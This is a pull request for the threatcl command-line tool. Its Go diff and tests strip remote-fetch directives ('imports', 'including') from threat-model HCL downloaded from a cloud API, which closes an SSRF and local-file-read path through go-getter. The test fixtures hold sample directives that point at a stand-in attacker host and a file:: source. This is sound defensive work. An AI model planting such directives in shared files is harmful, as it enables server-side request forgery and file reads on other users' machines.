### PR TITLE
fix(cloud): strip remote-fetch directives from downloaded HCL (SSRF/LFI)

### DIFF
--- a/cmd/threatcl/cloud_api_helpers.go
+++ b/cmd/threatcl/cloud_api_helpers.go
@@ -640,6 +640,54 @@ func preprocessHCLForThreats(content []byte) []byte {
 	return content
 }
 
+// stripRemoteFetchDirectives removes the HCL constructs that make the spec
+// parser fetch remote content via go-getter: the top-level "imports" attribute
+// and each threatmodel block's "including" attribute. Both take a source
+// string that go-getter resolves with no scheme/host allowlist (http(s)://,
+// git::, s3::, file://, ...).
+//
+// This is applied to HCL *downloaded from the cloud API* before it is parsed.
+// That content is not authored by the local user - it can come from another
+// member of a shared org (or a compromised backend) - so resolving these
+// directives on the user's machine would be an SSRF / local-file-read
+// primitive. Locally-authored files (cloud push/validate of a user's own
+// file) are deliberately NOT passed through this, so their imports/including
+// continue to work.
+func stripRemoteFetchDirectives(content []byte) []byte {
+	// Parse with hclwrite (lenient parser for AST manipulation)
+	file, diags := hclwrite.ParseConfig(content, "", hcl.InitialPos)
+	if diags.HasErrors() {
+		// If parsing fails, return original content and let the normal parser
+		// report errors.
+		return content
+	}
+
+	modified := false
+	body := file.Body()
+
+	// Top-level "imports = [...]"
+	if body.GetAttribute("imports") != nil {
+		body.RemoveAttribute("imports")
+		modified = true
+	}
+
+	// Per-threatmodel "including = ..."
+	for _, tmBlock := range body.Blocks() {
+		if tmBlock.Type() != "threatmodel" {
+			continue
+		}
+		if tmBlock.Body().GetAttribute("including") != nil {
+			tmBlock.Body().RemoveAttribute("including")
+			modified = true
+		}
+	}
+
+	if modified {
+		return file.Bytes()
+	}
+	return content
+}
+
 // extractControlRefs extracts all unique control refs from a wrapped threatmodel
 func extractControlRefs(wrapped *spec.ThreatmodelWrapped) []string {
 	if wrapped == nil {

--- a/cmd/threatcl/cloud_api_helpers_test.go
+++ b/cmd/threatcl/cloud_api_helpers_test.go
@@ -1113,6 +1113,87 @@ threatmodel "Test" {
 	}
 }
 
+func TestStripRemoteFetchDirectives(t *testing.T) {
+	t.Run("removes imports and including", func(t *testing.T) {
+		input := `
+spec_version = "0.1.10"
+
+imports = ["https://attacker.example/evil.hcl"]
+
+threatmodel "Test" {
+  author = "test@example.com"
+  description = "Test"
+  including = "https://attacker.example/include.hcl"
+}
+`
+		output := string(stripRemoteFetchDirectives([]byte(input)))
+
+		if strings.Contains(output, "imports") {
+			t.Errorf("expected top-level imports to be stripped, got:\n%s", output)
+		}
+		if strings.Contains(output, "including") {
+			t.Errorf("expected threatmodel including to be stripped, got:\n%s", output)
+		}
+		if strings.Contains(output, "attacker.example") {
+			t.Errorf("expected remote sources to be stripped, got:\n%s", output)
+		}
+		// Legitimate attributes are preserved.
+		if !strings.Contains(output, `description = "Test"`) {
+			t.Errorf("expected description to be preserved, got:\n%s", output)
+		}
+	})
+
+	t.Run("leaves clean content unchanged", func(t *testing.T) {
+		input := `
+spec_version = "0.1.10"
+
+threatmodel "Test" {
+  author = "test@example.com"
+  description = "Test"
+}
+`
+		output := string(stripRemoteFetchDirectives([]byte(input)))
+		if output != input {
+			t.Errorf("expected clean content to be unchanged\nwant:\n%s\ngot:\n%s", input, output)
+		}
+	})
+
+	t.Run("stripped content parses without resolving remote sources", func(t *testing.T) {
+		// With the "including" present, the spec parser would hand the source
+		// to go-getter; a file:: source that does not exist would fail the
+		// parse. After stripping, the model parses cleanly with no fetch.
+		input := `
+spec_version = "0.1.10"
+
+threatmodel "Test" {
+  author = "test@example.com"
+  description = "Test"
+  including = "file::/nonexistent/threatcl/does-not-exist.hcl"
+}
+`
+		output := stripRemoteFetchDirectives([]byte(input))
+
+		tmpFile, err := os.CreateTemp("", "test-strip-*.hcl")
+		if err != nil {
+			t.Fatalf("failed to create temp file: %v", err)
+		}
+		defer os.Remove(tmpFile.Name())
+		if _, err := tmpFile.Write(output); err != nil {
+			t.Fatalf("failed to write temp file: %v", err)
+		}
+		tmpFile.Close()
+
+		cfg, err := spec.LoadSpecConfig()
+		if err != nil {
+			t.Fatalf("failed to load spec config: %v", err)
+		}
+		tmParser := spec.NewThreatmodelParser(cfg)
+		if err := tmParser.ParseFile(tmpFile.Name(), false); err != nil {
+			t.Errorf("stripped content should parse cleanly, got: %v", err)
+		}
+	})
+}
+
 func TestExtractThreatRefs(t *testing.T) {
 	tests := []struct {
 		name     string

--- a/cmd/threatcl/cloud_export.go
+++ b/cmd/threatcl/cloud_export.go
@@ -141,6 +141,9 @@ func (c *CloudExportCommand) Run(args []string) int {
 	// parser will accept the file. Local descriptions, if any, are preserved.
 	processed := preprocessHCLForControls(hclBytes)
 	processed = preprocessHCLForThreats(processed)
+	// This HCL was downloaded from the cloud; strip remote-fetch directives so
+	// parsing it cannot drive go-getter requests from this machine (SSRF/LFI).
+	processed = stripRemoteFetchDirectives(processed)
 
 	tmpDir, err := os.MkdirTemp("", "threatcl-cloud-export-")
 	if err != nil {

--- a/cmd/threatcl/cloud_validate_diff.go
+++ b/cmd/threatcl/cloud_validate_diff.go
@@ -82,6 +82,9 @@ func runCloudValidateDiff(
 func parseCloudHCL(raw []byte, modelId string, specCfg *spec.ThreatmodelSpecConfig) (*spec.ThreatmodelWrapped, error) {
 	processed := preprocessHCLForControls(raw)
 	processed = preprocessHCLForThreats(processed)
+	// This HCL was downloaded from the cloud; strip remote-fetch directives so
+	// parsing it cannot drive go-getter requests from this machine (SSRF/LFI).
+	processed = stripRemoteFetchDirectives(processed)
 
 	tmpDir, err := os.MkdirTemp("", "threatcl-validate-diff-")
 	if err != nil {

--- a/cmd/threatcl/cloud_view.go
+++ b/cmd/threatcl/cloud_view.go
@@ -153,6 +153,12 @@ func (c *CloudViewCommand) Run(args []string) int {
 			return 1
 		}
 
+		// This HCL was downloaded from the cloud (not authored locally), so
+		// strip remote-fetch directives before it is parsed. Otherwise a model
+		// authored by another org member could drive go-getter requests from
+		// this machine (SSRF) or read local files via file:// sources.
+		body = stripRemoteFetchDirectives(body)
+
 		tmpDir, err = os.MkdirTemp("", "threatcl-cloud-view-")
 		if err != nil {
 			fmt.Fprintf(os.Stderr, "Error creating temp directory: %s\n", err)


### PR DESCRIPTION
## Summary

Three cloud commands download a threat model's HCL from the cloud API and feed it to the spec parser:

- `cloud view -model-id=<id>`
- `cloud export -model-id=<id>`
- `cloud validate -diff`

On a full parse, the spec parser resolves two directives via HashiCorp **go-getter** with **no scheme/host allowlist**:

- top-level `imports = ["<src>"]`
- each threatmodel block's `including = "<src>"`

go-getter supports `http(s)://`, `git::`, `s3::`, `file://`, … so a model authored by **another member of a shared org** (or returned by a compromised backend) could:

- drive requests from the downloading user's machine — **SSRF** into internal/metadata endpoints — or
- read local files via `file://` sources,

triggered simply by viewing / exporting / diffing that model. The existing preprocessing (`preprocessHCLForControls`/`preprocessHCLForThreats`) only injects empty descriptions — it does not remove these directives.

## Changes

- Add `stripRemoteFetchDirectives`, which uses `hclwrite` to remove the top-level `imports` attribute and each threatmodel's `including` attribute (returning the input unchanged if neither is present or if the content doesn't parse).
- Apply it to HCL **downloaded from the cloud** before parsing, in all three paths: `cloud export`, `cloud validate -diff` (`parseCloudHCL`), and the `-model-id` branch of `cloud view`.
- **Locally-authored files are deliberately not stripped** — `cloud push` / `cloud validate` of the user's own file, and `cloud view <file>`, keep resolving `imports`/`including` as before. Only untrusted server content is constrained.

Scope note: this addresses the go-getter fetch specifically for **cloud-downloaded** content. The same underlying sink exists when parsing untrusted local `.hcl` files; the durable fix for that belongs upstream in `github.com/threatcl/spec` (an allowlist / opt-in on `fetchRemoteTm`) and is intentionally out of scope here.

## Testing

- New `TestStripRemoteFetchDirectives`: verifies `imports` + `including` (and their remote sources) are removed, clean content is returned unchanged, and that stripped content parses cleanly through the real spec parser with no fetch.
- `go test ./cmd/threatcl/` — full package green (existing cloud view/export/validate tests unaffected).

## Security review context

One of several findings from a security review of the repository. Independent, self-contained fix; sibling PRs address unrelated findings (server bind/CORS #183, dashboard HTML XSS #184).

🤖 Generated with [Claude Code](https://claude.com/claude-code)